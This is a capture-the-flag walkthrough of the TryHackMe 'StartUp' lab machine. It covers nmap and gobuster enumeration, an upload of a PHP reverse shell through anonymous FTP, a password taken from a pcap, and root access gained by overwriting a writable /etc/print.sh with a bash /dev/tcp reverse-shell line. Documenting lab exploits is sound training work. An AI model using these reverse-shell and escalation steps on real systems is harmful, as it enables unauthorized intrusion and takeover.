StartUp

Room Covers:

• Discovery

• Exploitation

• Privilege Escalation (horizontal + vertical)

Target Details

• IP: 10.10.115.38

Service and Content Discovery

• Scan Machine with Nmap

  nmap -sC -sV -Pn -oN nmap.txt 10.10.115.38
  
  Nmap scan report for 10.10.115.38
  Host is up (0.38s latency).
  Not shown: 996 closed tcp ports (conn-refused)
  PORT     STATE    SERVICE VERSION
  21/tcp   open     ftp     vsftpd 3.0.3
  | ftp-anon: Anonymous FTP login allowed (FTP code 230)
  | drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp [NSE: writeable]
  | -rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
  |_-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
  | ftp-syst:
  |   STAT:
  | FTP server status:
  |      Connected to 10.x.x.x
  |      Logged in as ftp
  |      TYPE: ASCII
  |      No session bandwidth limit
  |      Session timeout in seconds is 300
  |      Control connection is plain text
  |      Data connections will be plain text
  |      At session startup, client count was 2
  |      vsFTPd 3.0.3 - secure, fast, stable
  |_End of status
  22/tcp   open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey:
  |   2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)
  |   256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)
  |_  256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)
  80/tcp   open     http    Apache httpd 2.4.18 ((Ubuntu))
  |_http-title: Maintenance
  |_http-server-header: Apache/2.4.18 (Ubuntu)
  1131/tcp filtered caspssl
  Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
  
  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  # Nmap done at Sat Jul  2 13:34:28 2022 -- 1 IP address (1 host up) scanned in 64.99 seconds

  We can login anonymously on FTP and we can write data anonymously in ftp directory

• Services Discovered

  Service	Port	Version
  FTP	21	vsftpd 3.0.3
  SSH	22	OpenSSH 7.2p2
  HTTP	80	Apache httpd 2.4.18

• Visiting HTTP website doesn't provide much information

• Finding directories using gobuster

  gobuster dir -u http://10.10.115.38 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -t 30 --no-error -o web-dirs.txt

• Directories Found

  Directory	Link
  files	/files

• On visitng /files we get few files along with notice directory

Accessing FTP

• Login anonymously

  ftp 10.10.115.38
  
  Connected to 10.10.115.38.
  220 (vsFTPd 3.0.3)
  Name (10.10.115.38:attacker): anonymous
  331 Please specify the password.
  Password:
  230 Login successful.
  Remote system type is UNIX.
  Using binary mode to transfer files.
  ftp>

  Logged in successfully

• list files

  ftp> ls
  200 PORT command successful. Consider using PASV.
  150 Here comes the directory listing.
  drwxrwxrwx    2 65534    65534        4096 Jul 02 09:09 ftp
  -rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
  -rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt

  files are of web directory /files

Get Reverse Shell from Target Machine

• Download php reverse shell

  wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

• In reverse shell, change IP to TryHackMe VPN IP. default port is 1234

• Start Netcat listener

  nc -nlvp 1234

• Upload via FTP anonymously

  ftp> cd ftp
  250 Directory successfully changed.
  ftp> put php-reverse-shell.php
  local: php-reverse-shell.php remote: php-reverse-shell.php
  200 PORT command successful. Consider using PASV.
  150 Ok to send data.
  226 Transfer complete.
  5596 bytes sent in 0.00 secs (53.3676 MB/s)
  ftp>s

• From browser visit /files/ftp/ directory and click on reverse shell file to get reverse shell on attacker's terminal

  # nc -nlvp 1234
  listening on [any] 1234 ...
  connect to [10.x.x.x] from (UNKNOWN) [10.10.115.38] 51642
  Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
   08:15:07 up 13 min,  0 users,  load average: 0.07, 0.51, 0.44
  USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  /bin/sh: 0: can't access tty; job control turned off
  $

Search for First Flag

• Find files

  $ whoami
  www-data
  $ ls
  bin
  boot
  dev
  etc
  home
  incidents
  initrd.img
  initrd.img.old
  lib
  lib64
  lost+found
  media
  mnt
  opt
  proc
  recipe.txt
  root
  run
  sbin
  snap
  srv
  sys
  tmp
  usr
  vagrant
  var
  vmlinuz
  vmlinuz.old

• Read recipe.txt file

  $ cat recipe.txt
  Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was xxxx.

• We need to escalate privileges to read files

Privilege Escalation

• Finding files with sticky bits

  $ find / -perm -u=s -type f 2>/dev/null
  /bin/mount
  /bin/fusermount
  /bin/umount
  /bin/ping6
  /bin/su
  /bin/ping
  /usr/bin/passwd
  /usr/bin/pkexec
  /usr/bin/at
  /usr/bin/sudo
  /usr/bin/newuidmap
  /usr/bin/chfn
  /usr/bin/newgrp
  /usr/bin/chsh
  /usr/bin/newgidmap
  /usr/bin/gpasswd
  /usr/lib/eject/dmcrypt-get-device
  /usr/lib/dbus-1.0/dbus-daemon-launch-helper
  /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
  /usr/lib/snapd/snap-confine
  /usr/lib/openssh/ssh-keysign
  /usr/lib/policykit-1/polkit-agent-helper-1

  Couldn't find something important

• Checking for Python to get shell with tty

  $ python --version
  Python 2.7.12

• Spawn TTY terminal to use sudo/su

  python -c 'import pty; pty.spawn("/bin/bash")'
  www-data@startup

• from /incidents directory found a pcap file

  www-data@startup:/incidents$ ls -l
  total 32
  -rwxr-xr-x 1 www-data www-data 31224 Nov 12  2020 suspicious.pcapng

• To analzye this file in WireShark, we need to first download the file, let's copy this file in ftp directory, then we can download it from web server

  www-data@startup:/incidents$ cp suspicious.pcapng /var/www/html/files/ftp

• Download the file from http://10.10.115.38/files/ftp/suspicious.pcapng

• Load the file in WireShark, right click on TCP packet number around 200 and choose follow -> TCP Stream, a list of commands will pop up in a new window, from where we can find the password

• From pcap file: use follow lennie password c4ntg3txxxxxxxxxxx

• Now, we can log into lennie's account with the password

  su lennie
  Password:
  lennie@startup:~$

  We've successfully escalated privileges horiztontally

Get User Flag

• Finding Flag

  lennie@startup:~$ ls
  Documents  scripts  user.txt

• Read user.txt file

  lennie@startup:~$ cat user.txt
  THM{03ce3d619b80ccxxxxxxxxxxxxxxxxxx}

Escalating Privileges Vertically

• finding executables with sticky bits

  lennie@startup:~$ find / -perm -u=s -type f 2>/dev/null
  /bin/mount
  /bin/fusermount
  /bin/umount
  /bin/ping6
  /bin/su
  /bin/ping
  /usr/bin/passwd
  /usr/bin/pkexec
  /usr/bin/at
  /usr/bin/sudo
  /usr/bin/newuidmap
  /usr/bin/chfn
  /usr/bin/newgrp
  /usr/bin/chsh
  /usr/bin/newgidmap
  /usr/bin/gpasswd
  /usr/lib/eject/dmcrypt-get-device
  /usr/lib/dbus-1.0/dbus-daemon-launch-helper
  /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
  /usr/lib/snapd/snap-confine
  /usr/lib/openssh/ssh-keysign
  /usr/lib/policykit-1/polkit-agent-helper-1

  let's try sudo

• get sudo executables list

  lennie@startup:~$ sudo -l
  [sudo] password for lennie: c4ntg3t3n0ughsp1c3
  Sorry, user lennie may not run sudo on startup.

  We cannot use sudo command

• There was scripts folder in the home directory

  lennie@startup:~$ ls -l scripts
  total 8
  -rwxr-xr-x 1 root root 77 Nov 12  2020 planner.sh
  -rw-r--r-- 1 root root  1 Jul  2 10:42 startup_list.txt

  planner.sh script belongs to root user

• Read planner.sh script

  lennie@startup:~$ cat scripts/planner.sh
  #!/bin/bash
  echo $LIST > /home/lennie/scripts/startup_list.txt
  /etc/print.sh

  scripts calls another script /etc/print.sh with root privileges

• Let's analyze print.sh script

  lennie@startup:~$ ls -l /etc/print.sh
  -rwx------ 1 lennie lennie 60 Jul  2 10:11 /etc/print.sh

  This script belongs to lennie, hence we can write it and create a reverse shell with root access

• Overwrite file contents

  echo "bash -c 'exec sudo bash -i &>/dev/tcp/10.x.x.x/9999 <&1'" > /etc/print.sh

• Start netcat listener on attacker's machine on port 9999

  nc -nlvp 9999
  listening on [any] 9999 ...

• Execute planner.sh script

  bash /home/lennie/scripts/planner.sh

• Get Reverse Shell

  nc -nlvp 9999
  listening on [any] 9999 ...
  connect to [10.x.x.x] from (UNKNOWN) [10.10.115.38] 50290
  sudo: unable to resolve host startup
  bash: cannot set terminal process group (5564): Inappropriate ioctl for device
  bash: no job control in this shell
  root@startup:~#

  We've successfully got root privileges machine

Get Root Flag

• List files

  root@startup:~# ls
  root.txt

• Read root.txt file

  root@startup:~# cat root.txt
  THM{f963aaa6a43xxxxxxxxxxxxxxxxxxxxx}